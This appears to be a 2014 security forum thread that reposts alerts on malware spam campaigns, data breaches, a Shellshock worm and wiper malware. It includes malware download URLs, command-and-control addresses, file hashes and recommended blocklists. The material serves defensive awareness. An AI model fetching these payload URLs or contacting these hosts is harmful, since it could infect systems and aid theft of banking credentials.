17 Dec 2014 - "'JPMorgan Chase & Co You have received a new secure message' pretending to come from random names @jpmorgan .com with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
This is a secure, encrypted message.
Desktop Users:
Open the attachment (message_zdm.html) and follow the instructions.
Mobile Users:
Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.
Need Help?
Your personalized image for: <redacted>
This email and any attachments are confidential and for the sole use of the recipients. If you have received this email in error please notify the sender.
Email Security Powered by Voltage IBE
Copyright 2013 JPMorgan Chase & Co. All rights reserved
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/You-have-received-a-new-secure-message.jpg
17 December 2014: message_zdm.zip: Extracts to: message_zdm.exe
Current Virus total detections: 11/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/25808f5afa8c93d477a954e4a0444b63fbaccac72a56dcd87d252df2606c0e19/analysis/1418844158/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
217.199.168.166: https://www.virustotal.com/en/ip-address/217.199.168.166/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.10.68.178: https://www.virustotal.com/en/ip-address/217.10.68.178/information/
- http://threattrack.tumblr.com/post/105464831328/jp-morgan-chase-secure-message-spam
Dec 18, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/af4b5b4c92d5319141774b223b9140b5/tumblr_inline_ngqwacJHwm1r6pupn.png
Tagged: JPMorgan, Upatre
___
ICANN e-mail accounts, zone database breached in spearphishing attack
Password data, other personal information of account holders exposed.
- http://arstechnica.com/security/2014/12/icann-e-mail-accounts-zone-database-breached-in-spearphishing-attack/
Dec 17 2014 - "Unknown attackers used a spearphishing campaign to compromise sensitive systems operated by the Internet Corporation for Assigned Names and Numbers (ICANN), a coup that allowed them to take control of employee e-mail accounts and access personal information of people doing business with the group. ICANN, which oversees the Internet's address system, said in a release published Tuesday* that the breach also gave attackers administrative access to all files stored in its centralized zone data system**, as well as the names, postal addresses, e-mail addresses, fax and phone numbers, user names, and cryptographically hashed passwords of account holders who used the system. Domain registries use the database to help manage the current allocation of hundreds of new generic top level domains (gTLDs) currently underway. Attackers also gained unauthorized access to the content management systems of several ICANN blogs... As the group controlling the Internet's domain name system, ICANN is a prime target for all kinds of attacks from hackers eager to obtain data that can be used to breach other targets..."
* https://www.icann.org/news/announcement-2-2014-12-16-en
* https://czds.icann.org/en
___
Worm exploits nasty Shellshock bug to commandeer network storage systems
- http://arstechnica.com/security/2014/12/worm-exploits-nasty-shellshock-bug-to-commandeer-network-storage-systems/
Dec 15 2014 - "Criminal hackers are actively exploiting the critical shellshock vulnerability* to install a self-replicating backdoor on a popular line of storage systems, researchers have warned. The malicious worm targets network-attached storage systems made by Taiwan-based QNAP, according to a blog post published Sunday** by the Sans Institute. The underlying shellshock attack code exploits a bug in GNU Bash that gives attackers the ability to run commands and code of their choice on vulnerable systems. QNAP engineers released an update in October that patches systems against the vulnerability, but the discovery of the worm in the wild suggests a statistically significant portion of users have yet to apply it. Infected systems are equipped with a secure shell (SSH) server and a new administrative user, giving the attackers a persistent backdoor to sneak back into the device at any time in the future..."
* http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/
** https://isc.sans.edu/forums/diary/Worm+Backdoors+and+Secures+QNAP+Network+Storage+Devices/19061
:fear::fear: :mad:
AplusWebMaster
2014-12-19, 13:52
FYI...
Fake 'BACS payment' SPAM - XLS malware
- http://myonlinesecurity.co.uk/bacs-payment-ref9408yc-excel-xls-malware/
19 Dec 2014 - "'BACS payment Ref:9408YC' coming from random email addresses with a malicious Excel XLS attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please see below our payment confirmation for funds into your account on Tuesday re invoice 9408YC
Accounts Assistant
Tel: 01874 430 632
Fax: 01874 254 622
19 December 2014: 9408YC.xls - Current Virus total detections: 0/53* 0/55** 0/53***
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/cbdc93de4eded4d2df825a30f0e255136c3564738e3298f367a4557b5b360eba/analysis/1418987287/
** https://www.virustotal.com/en/file/2894ad6bef05b0bba2c6f56194f7402c5535b03c7bedda7df7065269cd52cb39/analysis/1418987903/
*** https://www.virustotal.com/en/file/f26d6bc06ae906df591432cc5a5038589358f1681a64c896c468a72beccb70c5/analysis/1418987497/
- http://blog.dynamoo.com/2014/12/malware-spam-bacs-payment-ref901109rw.html
19 Dec 2014
> https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
"... UPDATE: A further version of this is doing the rounds with an attachment which also has zero detections at VirusTotal*..."
* https://www.virustotal.com/en/file/0a1d7d4d463d74e93bde62fb659ebfbd83a16ca5d979f7adee0fc998037d4f10/analysis/1418994768/
... Behavioural information
TCP connections
194.146.136.1: https://www.virustotal.com/en/ip-address/194.146.136.1/information/
___
Fake ACH SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-blocked-transaction-case.html
19 Dec 2014 - "This -fake- ACH spam leads to malware:
Date: 19 December 2014 at 16:06
Subject: Blocked Transaction. Case No 970332
The Automated Clearing House transaction (ID: 732021371), recently initiated from your online banking account, was rejected by the other financial institution.
Canceled ACH transaction
ACH file Case ID 083520
Transaction Amount 1458.42 USD
Sender e-mail info@victimdomain
Reason of Termination See attached statement
Please open the word file enclosed with this email to get more info about this issue.
In the sample I have seen, the attachment is ACH transfer 1336.doc which despite the name is actually a .DOCX file, which has a VirusTotal dectection rate of 4/54*. Inside are a series of images detailing how to turn off macro security.. which is a very -bad- idea.
1] https://1.bp.blogspot.com/-zPH8zcx7OrY/VJR1Q7QBOEI/AAAAAAAAGAM/xX6zhss2M4Q/s1600/image3.png
2] https://2.bp.blogspot.com/-84ljBD1vRQg/VJR1Ru59Q2I/AAAAAAAAGAU/WcH0b9IEjII/s1600/image4.png
3] https://1.bp.blogspot.com/-vCCQWdg2iQ0/VJR1R9zpj1I/AAAAAAAAGAY/ASyT9ZXBVz8/s1600/image5.png
4] https://4.bp.blogspot.com/-cCjgc3glQpg/VJR1SDKNwjI/AAAAAAAAGAc/c_b1Rf1nawQ/s1600/image6.png
If you enable macros, then this macro... will run which will download a malicious binary from http ://nikolesy .com/tmp/ten.exe, this has a VirusTotal detection rate of 8/51** as is identified as the Dridex banking trojan."
* https://www.virustotal.com/en/file/332621eaa52f0289be55f01c6fa61dc93f541cfb52f718148958b72209e084ac/analysis/1419014981/
** https://www.virustotal.com/en/file/22015b1e727d0846fd051a1ee6bb8a243f2c8eb150d67bb8e0c82574eed694e4/analysis/1419015141/
___
Fake 'my-fax' SPAM
- http://blog.dynamoo.com/2014/12/malware-spam-no-replaymy-faxcom.html
19 Dec 2014 - "This -fake- fax spam leads to malware:
From: Fax [no-replay@ my-fax .com]
Date: 19 December 2014 at 15:37
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: http ://crematori .org/myfax/company.html
Documents are encrypted in transit and store in a secure repository...
... Clicking the link downloads a file fax8127480_924_pdf.zip which in turn contains a malicious executable fax8127480_924.exe which has a VirusTotal detection rate of 3/55*. Most automated analysis tools are inconclusive... but the VT report shows network connections to the following locations:
http ://202.153.35.133:40542/1912uk22//0/51-SP3/0/
http ://202.153.35.133:40542/1912uk22//1/0/0/
http ://natural-anxiety-remedies .com/wp-includes/images/wlw/pack22.pne
Recommended blocklist:
202.153.35.133
natural-anxiety-remedies .com "
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/1419003908/
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
___
Fake 'Target Order Confirmation' - malware SPAM
- http://www.hoax-slayer.com/target-order-information-malware.shtml
Dec 19, 2014 - "Order confirmation email purporting to be from Target claims that the company's online store has an order addressed to you... The email is -not- from Target. The link in the message opens a compromised website that contains malware. The Target version is just one in a series of similar malware messages that have falsely claimed to be from well-known stores, including Walmart, Costco and Wallgreens...
> http://www.hoax-slayer.com/images/target-order-information-malware-1.jpg
If you use a non-Windows operating system, you may see a message claiming that the download is not compatible with your computer. If you are using one of the targeted operating systems, the malicious file may start downloading automatically. Alternatively, a message on the website may instruct you to click a link to download the file. Typically, the download will be a .zip file that hides a .exe file inside. Opening the .exe file will install the malware. The malware payload used in these campaigns can vary. But, typically, the malware can steal personal information from your computer and relay it to online scammers. The malware in this version is designed to add your computer to the infamous Asprox Botnet... This email is just one in a continuing series of malware messages that claim to be from various high profile stores, including Costco, Walmart and Wallgreens. Other versions list order or transaction details, but do not name any particular store. Again, links in the messages lead to malware websites. In some cases, the malware is contained in an attached file. If you receive one of these -bogus- emails, do -not- click any links or open any attachments..."
___
Walgreens Order Spam
- http://threattrack.tumblr.com/post/105606986528/walgreens-order-spam
Dec 19, 2014 - "Subjects Seen:
Order Status
Typical e-mail details:
E-shop Walgreens has received an order addressed to you which has to be confirmed by the recipient within 4 days. Upon confirmation you may pick it in any nearest store of Walgreens.
Detailed order information is provided here.
Walgreens
Malicious URLs:
rugby-game .com/search.php?w=ZT5EpruzameN92MeSlvI09DbnfrIhx1yqu3wrootEpM=
Malicious File Name and MD5:
Walgreens_OrderID-543759.exe (39CEBF3F19AF4C4F17CA5D8EFB940CB6)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/834af3262758a5dc4d3189db0af8a91d/tumblr_inline_ngu2ovU7f51r6pupn.png
Tagged: Walgreens, Kuluoz
___
Ars was briefly hacked yesterday; here’s what we know
If you have an account on Ars Technica, please change your password today..
- http://arstechnica.com/staff/2014/12/ars-was-briefly-hacked-yesterday-heres-what-we-know/
Dec 16 2014 - "At 20:00 CT on December 14, an Internet intruder gained access to one of the Ars Web servers and spent the next hour attempting to get from the Web server to a more central machine. At 20:52, the attempt was successful thanks to information gleaned from a poorly located backup file. The next day, at 14:13, the hacker returned to the central server and replaced the main Ars webpage with a defacement page that streamed a song from the band Dual Core... "All the Things"... by 14:29, our technical team had removed the defaced page and restored normal Ars operations. We spent the afternoon changing all internal passwords and certificates and hardening server security even further. Log files show the hacker's movements through our servers and suggest that he or she had the opportunity to copy the user database. This database contains no payment information on Ars subscribers, but it does contain user e-mail addresses and passwords. Those passwords, however, are stored in hashed form (using 2,048 iterations of the MD5 algorithm and salted with a random series of characters). Out of an excess of caution, we strongly encourage all Ars readers - especially any who have reused their Ars passwords on other, more sensitive sites - to change their passwords today. We are continuing with a full autopsy of the hack and will provide updates if anything new comes to light..."
:fear::fear: :mad:
AplusWebMaster
2014-12-21, 14:59
FYI...
Targeted Destructive Malware - Alert (TA14-353A)
- https://www.us-cert.gov/ncas/alerts/TA14-353A
Last revised: Dec 20, 2014 - "Systems Affected: Microsoft Windows
Overview: US-CERT was recently notified by a trusted third party of cyber threat actors using a Server Message Block (SMB) Worm Tool to conduct cyber exploitation activities recently targeting a major entertainment company. This SMB Worm Tool is equipped with a Listening Implant, Lightweight Backdoor, Proxy Tool, Destructive Hard Drive Tool, and Destructive Target Cleaning Tool.
SMB Worm Tool: This worm uses a brute force authentication attack to propagate via Windows SMB shares. It connects home every five minutes to send log data back to command and control (C2) infrastructure if it has successfully spread to other Windows hosts via SMB port 445. The tool also accepts new scan tasking when it connects to C2*. There are two main threads: the first thread calls home and sends back logs (a list of successful SMB exploitations), and the second thread attempts to guess passwords for SMB connections. If the password is correctly guessed, a file share is established and file is copied and run on the newly-infected host...
Destructive Hard Drive Tool: This tool is a tailored hard-drive wiping tool that is intended to destroy data past the point of recovery and to complicate the victim machine’s recovery. If the CNE operator has administrator-level privileges on the host, the program will over-write portions of up-to the first four physical drives attached, and over-write the master boot record (MBR) with a program designed to cause further damage if the hard drive is re-booted. This further results in the victim machine being non-operational with irrecoverable data (There is a caveat for machines installed with the windows 7 operating system: windows 7 machines will continue to operate in a degraded state with the targeted files destroyed until after reboot, in which the infected MBR then wipes the drive.) If the actor has user-level access, the result includes specific files being deleted and practically irrecoverable, but the victim machine would remain usable.
Destructive Target Cleaning Tool: This tool renders victim machines inoperable by overwriting the Master Boot Record. The tool is dropped and installed by another executable and consists of three parts: an executable and a dll which contain the destructive components, and an encoded command file that contains the actual destruction commands to be executed.
... *summary of the C2 IP addresses:
203.131.222.102 Thailand...
217.96.33.164 Poland...
88.53.215.64 Italy...
200.87.126.116 Bolivia...
58.185.154.99 Singapore...
212.31.102.100 Cypress...
208.105.226.235 United States..."
(More detail at the us-cert URL above.)
203.131.222.102: https://www.virustotal.com/en/ip-address/203.131.222.102/information/
217.96.33.164: https://www.virustotal.com/en/ip-address/217.96.33.164/information/
88.53.215.64: https://www.virustotal.com/en/ip-address/88.53.215.64/information/
200.87.126.116: https://www.virustotal.com/en/ip-address/200.87.126.116/information/
58.185.154.99: https://www.virustotal.com/en/ip-address/58.185.154.99/information/
212.31.102.100: https://www.virustotal.com/en/ip-address/212.31.102.100/information/
208.105.226.235: https://www.virustotal.com/en/ip-address/208.105.226.235/information/
- http://arstechnica.com/security/2014/12/malware-believed-to-hit-sony-studio-contained-a-cocktail-of-badness/
Dec 19 2014
> http://cdn.arstechnica.net/wp-content/uploads/2014/12/c2-ip-addresses.png
___
Fake FedEx SPAM – malware
- http://myonlinesecurity.co.uk/fedex-postal-notification-service-malware/
20 Dec 2014 - "'Postal Notification Service' pretending to come from FedEx with a zip attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/12/Fedex-Postal-Notification-Service.jpg
20 December 2014 : notification.zip: Extracts to: notification_48957348759483759834759834758934798537498.exe
Current Virus total detections: 1/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an unknown file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/777771b8483ce8a8503ed4cdd86d425c3088c17fa7794512913751d48421a860/analysis/1419076775/
"Package Delivery" Themed Scam Alert
- https://www.us-cert.gov/ncas/current-activity/2014/12/19/FTC-Releases-Package-Delivery-Themed-Scam-Alert
Dec 19, 2014
> http://www.consumer.ftc.gov/blog/package-delivery-scam-delivered-your-inbox
:fear: :mad:
AplusWebMaster
2014-12-22, 19:41
FYI...
Angler EK on 193.109.69.59
- http://blog.dynamoo.com/2014/12/angler-ek-on-1931096959.html
22 Dec 2014 - "193.109.69.59 (Mir Telematiki Ltd, Russia) is hosting what appears to be the Angler Exploit Kit... infection chain... The last step is where the badness happens, hosted on 193.109.69.59 (Mir Telematiki Ltd, Russia) which is also being used to host the following malicious domains:
qwe.holidayspeedsix .biz
qwe.holidayspeedfive .biz
qwe.holidayspeedseven .biz
A quick look at the contents of 193.109.68.0/23 shows some other questionable sites. A look at the sites hosted* in this /23 indicates that most of them appear to be selling counterfeit goods, so -blocking- the entire /23 will probably be no great loss.
Recommended -minimum- blocklist:
193.109.69.59
holidayspeedsix .biz
holidayspeedfive .biz
holidayspeedseven .biz "
* http://www.dynamoo.com/files/mmuskatov.csv
193.109.69.59: https://www.virustotal.com/en/ip-address/193.109.69.59/information/
___
Fake 'Tiket alert' SPAM
- http://blog.dynamoo.com/2014/12/tiket-alert-spam-tiket-really.html
22 Dec 2014 - "Sometimes the spammers don't really try very hard. Like they have to make a quota or something. A "Tiket alert" from the FBI.. or is it FBR? Really?
From: FBR service [jon.wo@ fbi .com]
Date: 22 December 2014 at 18:29
Subject: Tiket alert
Look at the link file for more information.
http <redacted>
Assistant Vice President, FBR service
Management Corporation
I have seen another version of this where the download location is negociomega .com/ticket/fsb.html. Clicking on the link downloads a file ticket8724_pdf.zip which in turn contains a malicious executable ticket8724_pdf.exe. This has a VirusTotal detection rate of 2/54*. Between that VirusTotal analysis and the Anubis analysis we can see that the malware attempts to phone home to:
http ://202.153.35.133 :42463/2212us12//0/51-SP3/0/
http ://202.153.35.133 :42463/2212us12//1/0/0/
http ://moorfuse .com/images/unk12.pne
202.153.35.133 is Excell Media Pvt Ltd, India.
Recommended blocklist:
202.153.35.133
moorfuse .com
mitsuba-kenya .com
negociomega .com "
* https://www.virustotal.com/en/file/131855bdd2832705bf8c90f30efd43a22956ca86bab19f3a9941158fd33291af/analysis/1419277515/
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
188.132.231.115: https://www.virustotal.com/en/ip-address/188.132.231.115/information/
___
Fake 'Employee Documents' Fax SPAM
- http://blog.mxlab.eu/2014/12/19/email-employee-documents-internal-use-from-no-replaymy-fax-com-leads-to-malicious-zip-file/
Dec 19, 2014 - "... intercepted quite a large distribution campaign by email with the subject “Employee Documents – Internal Use”, this email is sent from the spoofed address “Fax <no-replay@ my-fax .com>” and has the following body:
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Fax Documents
DOCUMENT LINK: ... <redacted>
Documents are encrypted in transit and store in a secure repository ...
The downloaded file fax8127480_924_pdf.zip contains the 26 kB large file fax8127480_924.exe. The trojan is known as W32/Trojan.HZAT-8029, W32/Trojan3.MYF, Downloader-FSH!FFA9EE754457, Upatre.FH or a variant of Win32/Kryptik.CTMJ... Virus Total*..."
* https://www.virustotal.com/en/file/99b5c743e203cf0fd5be7699124668be35012aaa51233742f2cd979ab43a5dcb/analysis/
File name: fax8127480_924.exe
Detection ratio: 26/53
Analysis date: 2014-12-22
... Behavioural information
TCP connections
202.153.35.133: https://www.virustotal.com/en/ip-address/202.153.35.133/information/
174.127.104.112: https://www.virustotal.com/en/ip-address/174.127.104.112/information/
83.166.234.251: https://www.virustotal.com/en/ip-address/83.166.234.251/information/
23.10.252.26: https://www.virustotal.com/en/ip-address/23.10.252.26/information/
50.7.247.42: https://www.virustotal.com/en/ip-address/50.7.247.42/information/
217.172.180.178: https://www.virustotal.com/en/ip-address/217.172.180.178/information/
UDP communications
173.194.71.127: https://www.virustotal.com/en/ip-address/173.194.71.127/information/
:fear::fear: :mad:
AplusWebMaster
2014-12-23, 15:33
FYI...
Fake 'Remittance Advice' SPAM - malicious Excel attachment
- http://blog.dynamoo.com/2014/12/remittance-advice-spam-comes-with.html
23 Dec 2014 - "This -fake- remittance advice comes with a malicious Excel attachment.
From: Whitney
Date: 23 December 2014 at 09:12
Subject: Remittance Advice -DPRC93
Confidentiality and Disclaimer: This email and its attachments are intended for the addressee only and may be confidential or the subject of legal privilege.
If this email and its attachments have come to you in error you must take no action based on them, nor must you copy them, distribute them or show them to anyone.
Please contact the sender to notify them of the error...
The reference in the subject varies, and the name of the attachment always matches (so in this case DPRC93.xls). There are in fact three different versions of the document, all of which have a malicious macro. At the moment, none of these are detected by anti-virus vendors [1] [2] [3]... the macro has now changed completely, as it now loads some of the data from the Excel spreadsheet itself and puts it into a file %TEMP%\windows.vbs. So far I have seen three different scripts... which download a component from one of the following locations:
http ://185.48.56.133:8080/sstat/lldvs.php
http ://95.163.121.27:8080/sstat/lldvs.php
http ://92.63.88.100:8080/sstat/lldvs.php
It appears that this email is downloaded as test.exe and is then saved as %TEMP%\servics.exe. The ThreatExpert report shows traffic to the following:
194.146.136.1 (PE "Filipets Igor Victorovych", Ukraine)
80.237.255.196 (Denes Balazs / HostEurope, Germany)
85.25.20.107 (PlusServer AG, Germany)
VirusTotal indicates a detection rate of just 3/54*, and identifies it as Dridex.
Recommended blocklist:
194.146.136.1
80.237.255.196
85.25.20.107
185.48.56.133
95.163.121.27
92.63.88.100
92.63.88.106
Note that there are two IPs acting as downloaders in the 92.63.88.0/24 range (MWTV, Latvia). It may be that you would also want to block that range as well."
1] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/
2] https://www.virustotal.com/en/file/87bb64f9e759f93b0b47c1c8af917c5a11d66221fe146bbbc26373560c96a0fe/analysis/1419330170/
3] https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419330172/
* https://www.virustotal.com/en/file/a9239d875ecd1dbf4d83e1112c07c49b99b2594262b6a57e0eaa0518390d5ffb/analysis/1419333104/
- http://myonlinesecurity.co.uk/remittance-advice-pzdf16-excel-xls-malware/
23 Dec 2014
> 22 Dec 2014 : PZDF16.xls Current Virus total detections: 0/55*:
TKBJ98.xls Current Virus total detections: 0/55**
* https://www.virustotal.com/en/file/2c51b60afd53c78a31d96673a9ff33bf6d4eec17c774e8cf1dde2018b90b425a/analysis/1419328785/
** https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/1419329398/
- http://blog.mxlab.eu/2014/12/23/email-remittance-advice-lcdq26-contains-excel-file-with-malicious-macro/
Dec 23 2014
> https://www.virustotal.com/en/file/e78fb465f9767ae897dd928714f2a329987e765259f5f66275128aa2d44ee6b5/analysis/
___
Fake 'CHRISTMAS OFFERS.docx' SPAM - Word doc malware
- http://myonlinesecurity.co.uk/jayne-route2fitness-co-uk-christmas-offers-docx-word-doc-malware/
23 Dec 2014 - "'CHRISTMAS OFFERS.docx' pretending to come from Jayne <Jayne@ route2fitness .co.uk> with a malicious word doc attachment is another one from the current bot runs which try to download various Trojans and password stealers especially banking credential stealers, which may include cridex, dridex, dyreza and various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email body is completely -blank- . As per usual there are at least 2 different file sizes of this malware although all are named exactly the same.
22 Dec 2014: CHRISTMAS OFFERS.doc (41 kb) . Current Virus total detections: 0/55* : CHRISTMAS OFFERS.doc (44 kb) . Current Virus total detections: 0/56**
Downloads dridex Trojan from microinvent .com//js/bin.exe which is moved to and run from %temp%1\V2MUY2XWYSFXQ.exe Virus total*** ..."
* https://www.virustotal.com/en/file/0c45d7f517f1086528576c5b696303b792c29244dc0a4421f3720ed84a521b2e/analysis/1419327481/
** https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/1419327349/
*** https://www.virustotal.com/en/file/de25222783cdcbe20ca8d8d9a531f150387260e5297f672474141227eeff7773/analysis/1419334606/
- http://blog.mxlab.eu/2014/12/23/empty-email-with-attached-word-file-christmas-offers-docx-contains-malicious-macro/
Dec 23, 2014
> https://www.virustotal.com/en/file/211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c/analysis/
___
Network Time Protocol Vulnerabilities
- https://ics-cert.us-cert.gov//advisories/ICSA-14-353-01
Dec 22, 2014 - "... vulnerabilities could be exploited remotely. Exploits that target these vulnerabilities are publicly available. Products using NTP service prior to NTP-4.2.8 are affected. No specific vendor is specified because this is an open source protocol.
IMPACT: Exploitation of these vulnerabilities could allow an attacker to execute arbitrary code with the privileges of the ntpd process..."
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9295 - 7.5 (HIGH)
- http://arstechnica.com/security/2014/12/attack-code-exploiting-critical-bugs-in-net-time-sync-puts-servers-at-risk/
Dec 19 2014
:fear::fear: :mad:
AplusWebMaster
2014-12-24, 10:51
FYI...
MBR Wiper attacks strike Korean Power Plant
- http://blog.trendmicro.com/trendlabs-security-intelligence/mbr-wiper-attacks-strike-korean-power-plant/
Dec 23, 2014 - "In recent weeks, a major Korean electric utility has been affected by destructive malware, which was designed to wipe the master boot records (MBRs) of affected systems. It is believed that this MBR wiper arrived at the target systems in part via a vulnerability in the Hangul Word Processor (HWP), a commonly used application in South Korea. A variety of social engineering lures were used to get would-be victims to open these files. Below is a quick overview of the attack with the infection chain starting from a spearphishing email sent to the employees’ inboxes:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/12/Infection-chain_MBR-wiper3.png
We detect the malware as TROJ_WHAIM.A*, which is a fairly straightforward MBR wiper. In addition to the MBR, it also overwrites files that are of specific types on the affected system. It installs itself as a service on affected machines to ensure that it will run whenever the system is restarted... it uses file names, service names, and descriptions of actual legitimate Windows services. This ensures that a cursory examination of a system’s services may not find anything malicious, helping this threat -evade- detection... This particular MBR-wiping behavior, while uncommon, has been seen before. We observed these routines in March 2013 when several attacks hit various South Korean government agencies resulting in major disruptions to their operations. The malware involved in this attack overwrote the MBR with a series of the words PRINCPES, HASTATI, or PR!NCPES. The recent attack on Sony Pictures also exhibited a similar MBR-wiping capability. There are also similarities to the previous MBR wiper attacks as well. All three attacks mentioned earlier overwrite the MBR with certain repeated strings... These attacks highlight our findings about the destructive, MBR-wiping malware that appear to have become a part of the arsenal of several threat actors. This is a threat that system administrators will have to deal with, and not all targeted attack countermeasures will be effective. Techniques to mitigate the damage that these attacks cause should be considered as a part of defense-in-depth networks.
Update as of 11:29 P.M. PST, December 23, 2014
Upon further analysis, we confirmed that TROJ_WHAIM.A checks if the current date and time is Dec 10, 2014 11:00 AM or later. If it meets this condition, it sets the registry, HKEY_LOCAL_MACHINE\SOFTWARE\PcaSvcc\finish to 1, thus triggering the MBR infection. Otherwise, it sleeps for a minute and checks the system time again. Aside from the MBR infection capabilities and overwriting certain strings, another similarity of this attack to the March 2013 incident is its ‘time bomb’ routine. A certain action is set in motion once the indicated date/time by the attackers is reached by the infected system."
* http://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_whaim.a
"To restore your system's Master Boot Record (MBR)..."
South Korea seeks China's cooperation in probe into cyberattack on nuclear operator
- http://www.reuters.com/article/2014/12/24/us-northkorea-cybersecurity-nuclear-idUSKBN0K20DT20141224
Dec 24, 2014 - "... Connections to South Korean virtual private networks (VPNs) used in the cyberattacks were traced to multiple IP addresses in China's Shenyang city, located in a province which borders North Korea..."
Japan, wary of North Korea, works to secure infrastructure after Sony attack
- http://www.reuters.com/article/2014/12/24/us-northkorea-cyberattack-japan-idUSKBN0K20IX20141224
Dec 24, 2014 - "Japan, fearing it could be a soft target for possible North Korean cyberattacks in the escalating row over the Sony Pictures hack, has begun working to ensure basic infrastructure is safe and to formulate its diplomatic response, officials said... The government's National Information Security Center, working through various ministries, is pressing companies to improve their security from cyberattacks..."
Attack maps: http://map.ipviking.com/
___
Fake 'Signature Invoice' SPAM - malicious attachment
- http://blog.dynamoo.com/2014/12/malware-spam-rhianna-wellings.html
24 Dec 2014 - "Teckentrup Depot UK is a legitimate UK company, but these emails are -not- from Teckentrup Depot and they contain a malicious attachment. Teckentrup Depot has not been hacked, their database has not been compromised, and they are -not- responsible for this in any way.
From: Rhianna Wellings [Rhianna@ teckentrupdepot .co.uk]
Date: 24 December 2014 at 07:54
Subject: Signature Invoice 44281
Your report is attached in DOC format.
To load the report, you will need the Microsoft® Word® reader...
Attached is a malicious Word document called Signature Invoice.doc which comes in two different versions, both of which are undetected by AV vendors [1] [2]. Each one contains a different macro... which then downloads an additional component from one of these two locations:
http ://Lichtblick-tiere .de/js/bin.exe
http ://sunfung .hk/js/bin.exe
The file is saved into the location %TEMP%\1V2MUY2XWYSFXQ.exe and currently has a VirusTotal detection rate of just 4/56*. The ThreatExpert report shows traffic to the following IPs:
74.208.11.204 (1&1 Internet, US)
81.169.156.5 (Strato AG, Germany)
59.148.196.153 (HKBN, Hong Kong)
According to the Malwr report it also drops a malicious DLL with a detection rate of 24/56**, detected as the Dridex banking trojan.
Recommended blocklist:
74.208.11.204
81.169.156.5
59.148.196.153
lichtblick-tiere .de
sunfung .hk "
1] https://www.virustotal.com/en/file/4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38/analysis/1419412603/
2] https://www.virustotal.com/en/file/5dc552dabde0e6bd70ed1765d1a8c7cd394a6fc2c32519f529ae619f73739fd6/analysis/1419412612/
* https://www.virustotal.com/en/file/1f56a9ae1984cc1c9435609c0c63845fe0eebaa025fd24387829d280e7dfafcc/analysis/1419413157/
** https://www.virustotal.com/en/file/f259feff8c187b51dabb766491df61c8f0de1345427b337536c2ee4550ac937d/analysis/1419417434/
- http://myonlinesecurity.co.uk/rhianna-wellings-teckentrupdepot-co-uk-signature-invoice-44281-word-doc-malware/
24 Dec 2014 : Signature Invoice.doc . Current Virus total detections: 0/56*: 0/56**
* https://www.virustotal.com/en/file/4d7c6a2e9e5b963470cae32ce12f47a608c9477ec7d4b07861f639d15ff35a38/analysis/1419409093/
** https://www.virustotal.com/en/file/5dc552dabde0e6bd70ed1765d1a8c7cd394a6fc2c32519f529ae619f73739fd6/analysis/1419409548/
___
Fake Christmas offers infect PCs with banking Trojan
- https://blog.malwarebytes.org/fraud-scam/2014/12/santas-fake-christmas-offers-infect-pcs-with-banking-trojan/
Dec 24, 2014 - "... The email is accompanied by a Word document with a catchy name: CHRISTMAS OFFERS.docx:
> https://blog.malwarebytes.org/wp-content/uploads/2014/12/xmas_message.png
